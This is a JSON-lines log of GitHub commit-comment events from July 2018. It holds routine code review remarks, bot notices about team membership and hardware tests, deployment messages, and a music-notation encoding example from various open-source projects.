{"id":"7912731587","type":"CommitCommentEvent","actor":{"login":"vshcherb"},"repo":{"name":"osmandapp/OsmAnd-tools"},"payload":{"comment":{"id":29581331,"position":40,"line":128,"path":"java-tools/OsmAndServer/src/main/java/net/osmand/server/monitor/OsmAndServerMonitorTasks.java","commit_id":"43f41d00b88e4ffcc42726f368abe7885557d29b","created_at":"2018-07-03T13:54:23Z","updated_at":"2018-07-03T13:54:23Z","author_association":"MEMBER","body":"Formatting"}},"created_at":"2018-07-03T13:54:23Z"}
{"id":"7912732402","type":"CommitCommentEvent","actor":{"login":"vshcherb"},"repo":{"name":"osmandapp/OsmAnd-tools"},"payload":{"comment":{"id":29581333,"position":81,"line":169,"path":"java-tools/OsmAndServer/src/main/java/net/osmand/server/monitor/OsmAndServerMonitorTasks.java","commit_id":"43f41d00b88e4ffcc42726f368abe7885557d29b","created_at":"2018-07-03T13:54:31Z","updated_at":"2018-07-03T13:54:31Z","author_association":"MEMBER","body":"Formatting"}},"created_at":"2018-07-03T13:54:31Z"}
{"id":"7912732445","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/dask-yarn-feedstock"},"payload":{"comment":{"id":29581334,"position":null,"line":null,"path":null,"commit_id":"b9a0283376520c5c89de9799b3e77117edd45027","created_at":"2018-07-03T13:54:31Z","updated_at":"2018-07-03T13:54:31Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mrocklin, @jcrist were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-03T13:54:31Z"}
{"id":"7912732842","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29581335,"position":69,"line":21664,"path":"storage/innobase/handler/ha_innodb.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T13:54:35Z","updated_at":"2018-07-03T13:54:35Z","author_association":"CONTRIBUTOR","body":"We could `goto fail` (see my previous comment) to avoid code duplication."}},"created_at":"2018-07-03T13:54:35Z"}
{"id":"7912733056","type":"CommitCommentEvent","actor":{"login":"quequotion"},"repo":{"name":"quequotion/pantheon-bzr-qq"},"payload":{"comment":{"id":29581338,"position":null,"line":null,"path":null,"commit_id":"fa400b7704e0e05c935fa287f4edc70b92139101","created_at":"2018-07-03T13:54:37Z","updated_at":"2018-07-03T13:54:37Z","author_association":"OWNER","body":"This is a temporary solution to [submenus not displaying in (Ayatana) indicators](https://github.com/elementary/wingpanel-indicator-ayatana/issues/17), partially reversing [commit 105c1d0](https://github.com/elementary/wingpanel/commit/105c1d0c07f5c4b5f7bf67a50dafee742717f17a).\r\n\r\nThere doesn't seem to be any _visible_ drawback to doing so."}},"created_at":"2018-07-03T13:54:37Z"}
{"id":"7912733333","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581339,"position":36,"line":141,"path":"app/src/main/java/com/bobin/somemapapp/ui/fragment/MapFragment.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:54:40Z","updated_at":"2018-07-03T13:54:40Z","author_association":"NONE","body":"этот метод дёргает презентер, а начинает он их дергать только после того, как onMapReady\r\nа проверку написал, чтобы перестраховаться. согласен, избыточна"}},"created_at":"2018-07-03T13:54:40Z"}
{"id":"7912733726","type":"CommitCommentEvent","actor":{"login":"OmarIthawi"},"repo":{"name":"appsembler/configuration"},"payload":{"comment":{"id":29581341,"position":33,"line":24,"path":"playbooks/roles/appsembler_reporting/tasks/main.yml","commit_id":"fb1a412dccd2e8b6832e0e7b2765638236eb9672","created_at":"2018-07-03T13:54:44Z","updated_at":"2018-07-03T13:54:44Z","author_association":"MEMBER","body":"Do you really want to have this as a `content`? Given that now there's a dedicate role for it."}},"created_at":"2018-07-03T13:54:44Z"}
{"id":"7912738510","type":"CommitCommentEvent","actor":{"login":"vshcherb"},"repo":{"name":"osmandapp/OsmAnd-tools"},"payload":{"comment":{"id":29581355,"position":73,"line":161,"path":"java-tools/OsmAndServer/src/main/java/net/osmand/server/monitor/OsmAndServerMonitorTasks.java","commit_id":"43f41d00b88e4ffcc42726f368abe7885557d29b","created_at":"2018-07-03T13:55:28Z","updated_at":"2018-07-03T13:55:28Z","author_association":"MEMBER","body":"No need to spam with notifications like that"}},"created_at":"2018-07-03T13:55:28Z"}
{"id":"7912740315","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/satpy-feedstock"},"payload":{"comment":{"id":29581361,"position":null,"line":null,"path":null,"commit_id":"a4ac47ed34947b1002c5d01f6f2efd67eb6fa498","created_at":"2018-07-03T13:55:45Z","updated_at":"2018-07-03T13:55:45Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @djhoese, @mraspaud, @adybbroe, @pnuu were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-03T13:55:45Z"}
{"id":"7912741347","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581367,"position":53,"line":211,"path":"app/src/main/java/com/bobin/somemapapp/ui/fragment/MapFragment.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:55:55Z","updated_at":"2018-07-03T13:55:55Z","author_association":"NONE","body":"этот класс был заведен, чтобы презентер не зависел от Gmap - вдруг я захочу переделать на Yandex.mapkit"}},"created_at":"2018-07-03T13:55:55Z"}
{"id":"7912742360","type":"CommitCommentEvent","actor":{"login":"vshcherb"},"repo":{"name":"osmandapp/OsmAnd-tools"},"payload":{"comment":{"id":29581374,"position":77,"line":165,"path":"java-tools/OsmAndServer/src/main/java/net/osmand/server/monitor/OsmAndServerMonitorTasks.java","commit_id":"43f41d00b88e4ffcc42726f368abe7885557d29b","created_at":"2018-07-03T13:56:05Z","updated_at":"2018-07-03T13:56:05Z","author_association":"MEMBER","body":"Message is unclear. \"Map index is not correctly generated on the website (check <url>)\""}},"created_at":"2018-07-03T13:56:05Z"}
{"id":"7912743973","type":"CommitCommentEvent","actor":{"login":"leggomuhgreggo"},"repo":{"name":"leggomuhgreggo/ati"},"payload":{"comment":{"id":29581383,"position":28,"line":28,"path":"src/components/modules/Instagram/index.js","commit_id":"cf5075bff15d052a103d558525e47cd2274de3e7","created_at":"2018-07-03T13:56:20Z","updated_at":"2018-07-03T13:56:20Z","author_association":"OWNER","body":"https://github.com/prettier/prettier/issues/4223\r\n\r\nI don't love it, but prettier is so clutch"}},"created_at":"2018-07-03T13:56:20Z"}
{"id":"7912744790","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29581389,"position":90,"line":21685,"path":"storage/innobase/handler/ha_innodb.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T13:56:27Z","updated_at":"2018-07-03T13:56:27Z","author_association":"CONTRIBUTOR","body":"Remove the space-after-TAB before both comment lines."}},"created_at":"2018-07-03T13:56:27Z"}
{"id":"7912745882","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":29581399,"position":null,"line":null,"path":null,"commit_id":"f0e1012aedaf5e5ed2e254249d2ca93c226282ea","created_at":"2018-07-03T13:56:37Z","updated_at":"2018-07-03T13:56:37Z","author_association":"CONTRIBUTOR","body":"Allows rests encoded with `[[` and `]]` to indicate that the tie connects two non-adjacent notes.\r\n\r\nDiscussed in issue https://github.com/humdrum-tools/verovio-humdrum-viewer/issues/108\r\n\r\nExample:\r\n\r\n<img width=\"883\" alt=\"screen shot 2018-07-03 at 3 55 02 pm\" src=\"https://user-images.githubusercontent.com/3487289/42224070-831d4136-7ed9-11e8-8f49-1d544695067e.png\">\r\n\r\n\r\nHumdrum:\r\n\r\n```\r\n**kern\r\n=1\r\n[[4c\r\n[[4e\r\n[4g\r\n1]c ]1e]] 1g]\r\n=||\r\n=1\r\n[[4c\r\n[[4e\r\n[4g\r\n*^\r\n4g] \t4e]] 4c]]\r\n*v\t*v\r\n=||\r\n*-\r\n```\r\n\r\nMEI conversion:\r\n\r\n```xml\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://relaxng.org/ns/structure/1.0\"?>\r\n<?xml-model href=\"http://music-encoding.org/schema/4.0.0/mei-all.rng\" type=\"application/xml\" schematypens=\"http://purl.oclc.org/dsdl/schematron\"?>\r\n<mei xmlns=\"http://www.music-encoding.org/ns/mei\" meiversion=\"4.0.0\">\r\n    <meiHead>\r\n        <fileDesc>\r\n            <titleStmt>\r\n                <title />\r\n            </titleStmt>\r\n            <pubStmt />\r\n        </fileDesc>\r\n        <encodingDesc>\r\n            <appInfo>\r\n                <application isodate=\"2018-07-03T15:56:12\" version=\"2.0.0-dev-f99f5ee\">\r\n                    <name>Verovio</name>\r\n                    <p>Transcoded from Humdrum</p>\r\n                </application>\r\n            </appInfo>\r\n        </encodingDesc>\r\n        <workDesc>\r\n            <work>\r\n                <titleStmt>\r\n                    <title />\r\n                </titleStmt>\r\n            </work>\r\n        </workDesc>\r\n    </meiHead>\r\n    <music>\r\n        <body>\r\n            <mdiv xml:id=\"mdiv-0000000359067341\">\r\n                <score xml:id=\"score-0000000415752117\">\r\n                    <scoreDef xml:id=\"scoredef-0000001531766111\" midi.bpm=\"400\">\r\n                        <staffGrp xml:id=\"staffgrp-0000001711679045\">\r\n                            <staffDef xml:id=\"staffdef-0000001902711022\" clef.shape=\"G\" clef.line=\"2\" n=\"1\" lines=\"5\">\r\n                                <label xml:id=\"label-0000001684969642\" />\r\n                            </staffDef>\r\n                        </staffGrp>\r\n                    </scoreDef>\r\n                    <section xml:id=\"section-L1F1\">\r\n                        <measure xml:id=\"measure-L2\" right=\"dbl\" n=\"1\">\r\n                            <staff xml:id=\"staff-L2F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L2F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L3F1\" dur=\"4\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L4F1\" dur=\"4\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L5F1\" dur=\"4\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    <chord xml:id=\"chord-L6F1\" dur=\"1\">\r\n                                        <note xml:id=\"note-L6F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L6F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L6F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <tie xml:id=\"tie-L3F1-L6F1S1\" startid=\"#note-L3F1\" endid=\"#note-L6F1S1\" />\r\n                            <tie xml:id=\"tie-L4F1-L6F1S2\" startid=\"#note-L4F1\" endid=\"#note-L6F1S2\" />\r\n                            <tie xml:id=\"tie-L5F1-L6F1S3\" startid=\"#note-L5F1\" endid=\"#note-L6F1S3\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L8\" right=\"dbl\" n=\"1\">\r\n                            <staff xml:id=\"staff-L8F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L8F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L9F1\" dur=\"4\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L10F1\" dur=\"4\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                    <note xml:id=\"note-L11F1\" dur=\"4\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    <chord xml:id=\"chord-L13F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L13F1S1\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L13F2N2\" n=\"2\">\r\n                                    <space xml:id=\"space-0000000111596139\" dots=\"1\" dur=\"2\" />\r\n                                    <chord xml:id=\"chord-L13F2\" dur=\"4\">\r\n                                        <note xml:id=\"note-L13F2S1\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L13F2S2\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <tie xml:id=\"tie-L11F1-L13F1S1\" startid=\"#note-L11F1\" endid=\"#note-L13F1S1\" />\r\n                            <tie xml:id=\"tie-L10F1-L13F2S1\" startid=\"#note-L10F1\" endid=\"#note-L13F2S1\" />\r\n                            <tie xml:id=\"tie-L9F1-L13F2S2\" startid=\"#note-L9F1\" endid=\"#note-L13F2S2\" />\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```"}},"created_at":"2018-07-03T13:56:37Z"}
{"id":"7912745984","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581400,"position":4,"line":31,"path":"app/src/main/java/com/bobin/somemapapp/utils/AppUtils.java","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:56:38Z","updated_at":"2018-07-03T13:56:38Z","author_association":"NONE","body":"не знал о таком"}},"created_at":"2018-07-03T13:56:38Z"}
{"id":"7912746179","type":"CommitCommentEvent","actor":{"login":"scttmcvy"},"repo":{"name":"scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434"},"payload":{"comment":{"id":29581401,"position":null,"line":null,"path":null,"commit_id":"26c965b2b9f86634bdc94081aa94ec8d45c3fea3","created_at":"2018-07-03T13:56:40Z","updated_at":"2018-07-03T13:56:40Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/7b7fd12f-c3a6-4928-b531-f17b18d632e4?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180703123746434\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/79ab610f-61d7-4153-bcbf-d27d4568e6ff?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180703123746434\") deployed [sample-cloud-native-toolchain-tutorial-20180703123746434](https://github.com/scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434/releases/tag/deploy-ibm-yp-eu-gb-scott.mcavoy-test-20180703-135638 \"deploy-ibm-yp-eu-gb-scott.mcavoy-test-20180703-135638\") to [test](https://console.bluemix.net/apps/74cdb91a-3a0f-4058-a7e7-a92c28dc6908?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:scott.mcavoy:test\"), including this commit"}},"created_at":"2018-07-03T13:56:40Z"}
{"id":"7912747057","type":"CommitCommentEvent","actor":{"login":"Dafnik"},"repo":{"name":"fschaupp/DatePoll"},"payload":{"comment":{"id":29581404,"position":30,"line":21,"path":"public/sites/basic/organisation.php","commit_id":"c44d1a5444edff3adf75fe081b9703b11e0db04c","created_at":"2018-07-03T13:56:48Z","updated_at":"2018-07-03T13:56:48Z","author_association":"COLLABORATOR","body":"Es gibt eine PHP Methode die genau diese beiden alerts parst. Heißt glaub ich parseStandartAlerts()"}},"created_at":"2018-07-03T13:56:48Z"}
{"id":"7912747524","type":"CommitCommentEvent","actor":{"login":"ilmirus"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29581406,"position":53,"line":53,"path":"libraries/stdlib/coroutines/jvm/src/kotlin/coroutines/jvm/internal/ContinuationImpl.kt","commit_id":"82a5063af8c8c0987ffd24a85b897d0647633153","created_at":"2018-07-03T13:56:52Z","updated_at":"2018-07-03T13:56:52Z","author_association":"CONTRIBUTOR","body":"This leaves `intercepted` unintercepted. Replace `this` with `it` or use `apply`."}},"created_at":"2018-07-03T13:56:52Z"}
{"id":"7912755365","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"OpenModLoader/Enigma"},"payload":{"comment":{"id":29581422,"position":null,"line":null,"path":null,"commit_id":"3fde8f31d5e35256935de6945f6d36757e8e4adc","created_at":"2018-07-03T13:58:05Z","updated_at":"2018-07-03T13:58:05Z","author_association":"NONE","body":"Let me know if this breaks anything, if it does ill revert it. "}},"created_at":"2018-07-03T13:58:05Z"}
{"id":"7912758892","type":"CommitCommentEvent","actor":{"login":"nikitosbobin"},"repo":{"name":"repitch/somemapapp"},"payload":{"comment":{"id":29581427,"position":5,"line":69,"path":"app/src/main/res/layout/item_deposition_point.xml","commit_id":"22392264548944033a6869efab3765f5df148e69","created_at":"2018-07-03T13:58:37Z","updated_at":"2018-07-03T13:58:37Z","author_association":"NONE","body":"про декоратор знаю, просто вшитый DividerDecorator занимал всю ширину, а мне хотелось, чтобы он не доходил до левого края. И хотелось это сделать быстро, поэтому не написал свой декоратор"}},"created_at":"2018-07-03T13:58:37Z"}
{"id":"7912769805","type":"CommitCommentEvent","actor":{"login":"whtsky"},"repo":{"name":"offu/close-issue-app"},"payload":{"comment":{"id":29581454,"position":null,"line":null,"path":null,"commit_id":"7c5d449600e6a01e010196e0b8bbb1390184ca60","created_at":"2018-07-03T14:00:21Z","updated_at":"2018-07-03T14:00:21Z","author_association":"NONE","body":"@helloqiu 为啥会依赖这个"}},"created_at":"2018-07-03T14:00:21Z"}
{"id":"7912771866","type":"CommitCommentEvent","actor":{"login":"scttmcvy"},"repo":{"name":"scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434"},"payload":{"comment":{"id":29581460,"position":null,"line":null,"path":null,"commit_id":"26c965b2b9f86634bdc94081aa94ec8d45c3fea3","created_at":"2018-07-03T14:00:39Z","updated_at":"2018-07-03T14:00:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/7b7fd12f-c3a6-4928-b531-f17b18d632e4?env_id=ibm%3Ayp%3Aeu-gb \"cloud-native-toolchain-tutorial-20180703123746434\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/79ab610f-61d7-4153-bcbf-d27d4568e6ff?env_id=ibm%3Ayp%3Aeu-gb \"sample-cloud-native-toolchain-tutorial-20180703123746434\") deployed [sample-cloud-native-toolchain-tutorial-20180703123746434](https://github.com/scttmcvy/sample-cloud-native-toolchain-tutorial-20180703123746434/releases/tag/deploy-ibm-yp-eu-gb-scott.mcavoy-prod-20180703-140037 \"deploy-ibm-yp-eu-gb-scott.mcavoy-prod-20180703-140037\") to [prod](https://console.bluemix.net/apps/782fcce3-991b-493b-92a9-fef50436e0a0?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:scott.mcavoy:prod\"), including this commit"}},"created_at":"2018-07-03T14:00:39Z"}
{"id":"7912775548","type":"CommitCommentEvent","actor":{"login":"OPARA-PROSPER"},"repo":{"name":"Onyiih/Pixel-Art-Maker"},"payload":{"comment":{"id":29581469,"position":null,"line":null,"path":null,"commit_id":"fa4d0ebc168ecfcbce6251106784064f3ffd7107","created_at":"2018-07-03T14:01:14Z","updated_at":"2018-07-03T14:01:14Z","author_association":"NONE","body":"Great commenting in your design.js"}},"created_at":"2018-07-03T14:01:14Z"}
{"id":"7912776973","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi0"},"payload":{"comment":{"id":29581473,"position":null,"line":null,"path":null,"commit_id":"572f02e3ed13947e03193914cfe94ab55804f04f","created_at":"2018-07-03T14:01:27Z","updated_at":"2018-07-03T14:01:27Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi0/2e9ecc16-a18f-4148-afd0-5604a70e6075\n"}},"created_at":"2018-07-03T14:01:27Z"}
{"id":"7912783015","type":"CommitCommentEvent","actor":{"login":"pancodia"},"repo":{"name":"TresAmigosSD/SMV"},"payload":{"comment":{"id":29581481,"position":null,"line":null,"path":null,"commit_id":"5fce1fdc8fda23a84f6966e26f6264c7e5204fdd","created_at":"2018-07-03T14:02:22Z","updated_at":"2018-07-03T14:02:22Z","author_association":"NONE","body":"Why SMV stands for \"Spark Modeling Variables\" in the figure? I thought it is \"Spark Modularized View\""}},"created_at":"2018-07-03T14:02:22Z"}
{"id":"7912785369","type":"CommitCommentEvent","actor":{"login":"SunBangbang"},"repo":{"name":"SunBangbang/object"},"payload":{"comment":{"id":29581483,"position":null,"line":null,"path":null,"commit_id":"a47fad061d0ce2189def498b6c0727a402492810","created_at":"2018-07-03T14:02:45Z","updated_at":"2018-07-03T14:02:45Z","author_association":"OWNER","body":"mysqli操作php"}},"created_at":"2018-07-03T14:02:45Z"}
{"id":"7912785731","type":"CommitCommentEvent","actor":{"login":"lukebakken"},"repo":{"name":"rabbitmq/rabbitmq-server-release"},"payload":{"comment":{"id":29581485,"position":null,"line":null,"path":null,"commit_id":"69607e0c1abfcb1e7dd9671deaae7a5c4e04435e","created_at":"2018-07-03T14:02:49Z","updated_at":"2018-07-03T14:02:49Z","author_association":"MEMBER","body":"Aha, good idea. This will help on an upgrade."}},"created_at":"2018-07-03T14:02:49Z"}
{"id":"7912785840","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29581487,"position":null,"line":null,"path":null,"commit_id":"e7181d491d8a431eb2bc23652f9c2c491cb6d7c5","created_at":"2018-07-03T14:02:50Z","updated_at":"2018-07-03T14:02:50Z","author_association":"NONE","body":"> I still seem to get the black screen though after the Infogrames FMV sequence with Conflict Zone - Modern War Strategy.\r\n\r\nI have the same problem with the libretro OIT core. It freezes at the end of the first FMV sequence. \r\nNormally there's a second FMV sequence, then the VMU selection screen and reicast was crashing at this point (not freezing or hanging). It's not crashing anymore thanks to this commit but the libretro core seems to have a different problem."}},"created_at":"2018-07-03T14:02:50Z"}
{"id":"7912786461","type":"CommitCommentEvent","actor":{"login":"Atala"},"repo":{"name":"coopcycle/coopcycle-web"},"payload":{"comment":{"id":29581489,"position":7,"line":46,"path":"js/app/restaurant/OrderList.jsx","commit_id":"a2f0b653aea9ba45799e84acccbd13c44423e133","created_at":"2018-07-03T14:02:55Z","updated_at":"2018-07-03T14:02:55Z","author_association":"MEMBER","body":"yes indeed!"}},"created_at":"2018-07-03T14:02:55Z"}
{"id":"7912790377","type":"CommitCommentEvent","actor":{"login":"massdosage"},"repo":{"name":"HotelsDotCom/circus-train"},"payload":{"comment":{"id":29581495,"position":4,"line":4,"path":"CHANGELOG.md","commit_id":"b468bcf05654b69156d9a243a9f630f5c62da165","created_at":"2018-07-03T14:03:33Z","updated_at":"2018-07-03T14:03:33Z","author_association":"MEMBER","body":"ConfiGuration -> Configuration"}},"created_at":"2018-07-03T14:03:33Z"}
{"id":"7912796529","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi2"},"payload":{"comment":{"id":29581509,"position":null,"line":null,"path":null,"commit_id":"7cb7a37370fa6de267ab18f12910c6ecf1976621","created_at":"2018-07-03T14:04:31Z","updated_at":"2018-07-03T14:04:31Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi2/247c7e35-cbd8-43ea-942d-3ad11588697b\n"}},"created_at":"2018-07-03T14:04:31Z"}
{"id":"7912802917","type":"CommitCommentEvent","actor":{"login":"Jfortunati"},"repo":{"name":"Jfortunati/demo-repo"},"payload":{"comment":{"id":29581520,"position":null,"line":null,"path":null,"commit_id":"58cf245932badae383050f71959232fcd4716c54","created_at":"2018-07-03T14:05:31Z","updated_at":"2018-07-03T14:05:31Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-03T14:05:31Z"}
{"id":"7912806288","type":"CommitCommentEvent","actor":{"login":"nervesbot"},"repo":{"name":"nerves-project/nerves_system_rpi"},"payload":{"comment":{"id":29581524,"position":null,"line":null,"path":null,"commit_id":"f02b2844e76bea498175d24f783aadec87809abd","created_at":"2018-07-03T14:06:03Z","updated_at":"2018-07-03T14:06:03Z","author_association":"NONE","body":"Nerves Hardware Test \nStatus: Results Received\n%{\"failures\" => 0, \"skipped\" => 0, \"total\" => 3}\nhttps://nerves-test-server.herokuapp.com/nerves-project/nerves_system_rpi/09a59b0c-1ca2-49a6-b7c0-156707e5e58e\n"}},"created_at":"2018-07-03T14:06:03Z"}
{"id":"7912807240","type":"CommitCommentEvent","actor":{"login":"Jfortunati"},"repo":{"name":"Jfortunati/demo-repo"},"payload":{"comment":{"id":29581526,"position":null,"line":null,"path":null,"commit_id":"a3902187a4121fa51867a22d3b25039866637f59","created_at":"2018-07-03T14:06:13Z","updated_at":"2018-07-03T14:06:13Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-03T14:06:13Z"}
{"id":"7912808727","type":"CommitCommentEvent","actor":{"login":"adulau"},"repo":{"name":"MISP/MISP"},"payload":{"comment":{"id":29581530,"position":null,"line":null,"path":null,"commit_id":"45c79c04aee4efedeb1e54b2f78760e33c8ee72f","created_at":"2018-07-03T14:06:26Z","updated_at":"2018-07-03T14:06:26Z","author_association":"MEMBER","body":"Thank you ;-)"}},"created_at":"2018-07-03T14:06:26Z"}
{"id":"7912809511","type":"CommitCommentEvent","actor":{"login":"Shadowrs"},"repo":{"name":"tcooc/AdditionalPipesBC"},"payload":{"comment":{"id":29581531,"position":5,"line":8,"path":"src/main/resources/assets/additionalpipes/lang/en_US.lang","commit_id":"9c73c86b48ca89c3d4d339b7dded88fef11c84cf","created_at":"2018-07-03T14:06:34Z","updated_at":"2018-07-03T14:06:34Z","author_association":"NONE","body":"Any chance we'll see the power teleport pipe ported soon? Thanks!"}},"created_at":"2018-07-03T14:06:34Z"}
{"id":"7912810622","type":"CommitCommentEvent","actor":{"login":"Jfortunati"},"repo":{"name":"Jfortunati/demo-repo"},"payload":{"comment":{"id":29581538,"position":null,"line":null,"path":null,"commit_id":"493239ede245374e98cdc6aec9633f897bc119f2","created_at":"2018-07-03T14:06:45Z","updated_at":"2018-07-03T14:06:45Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-03T14:06:45Z"}
{"id":"7912811230","type":"CommitCommentEvent","actor":{"login":"helloqiu"},"repo":{"name":"offu/close-issue-app"},"payload":{"comment":{"id":29581539,"position":null,"line":null,"path":null,"commit_id":"7c5d449600e6a01e010196e0b8bbb1390184ca60","created_at":"2018-07-03T14:06:51Z","updated_at":"2018-07-03T14:06:51Z","author_association":"CONTRIBUTOR","body":"@whtsky 不太懂，感觉不用，删了吧"}},"created_at":"2018-07-03T14:06:51Z"}
{"id":"7912811293","type":"CommitCommentEvent","actor":{"login":"Jfortunati"},"repo":{"name":"Jfortunati/demo-repo"},"payload":{"comment":{"id":29581540,"position":null,"line":null,"path":null,"commit_id":"d580086ceeff564ecf397f99b7a9678b8d330453","created_at":"2018-07-03T14:06:52Z","updated_at":"2018-07-03T14:06:52Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-03T14:06:52Z"}
{"id":"7912811931","type":"CommitCommentEvent","actor":{"login":"Jfortunati"},"repo":{"name":"Jfortunati/demo-repo"},"payload":{"comment":{"id":29581542,"position":null,"line":null,"path":null,"commit_id":"4154d9717f533c735e7e1b0e985a21a8032b048f","created_at":"2018-07-03T14:06:58Z","updated_at":"2018-07-03T14:06:58Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-03T14:06:58Z"}
{"id":"7912831701","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"rougier/freetype-py"},"payload":{"comment":{"id":29581593,"position":4,"line":84,"path":".travis.yml","commit_id":"4ca90e3831813eb361f0b4a17430351c40655886","created_at":"2018-07-03T14:10:13Z","updated_at":"2018-07-03T14:10:13Z","author_association":"CONTRIBUTOR","body":"no! leave it like it was before.. You _don't_ want Travis to rebuild the wheels _outside_ the docker container!"}},"created_at":"2018-07-03T14:10:13Z"}
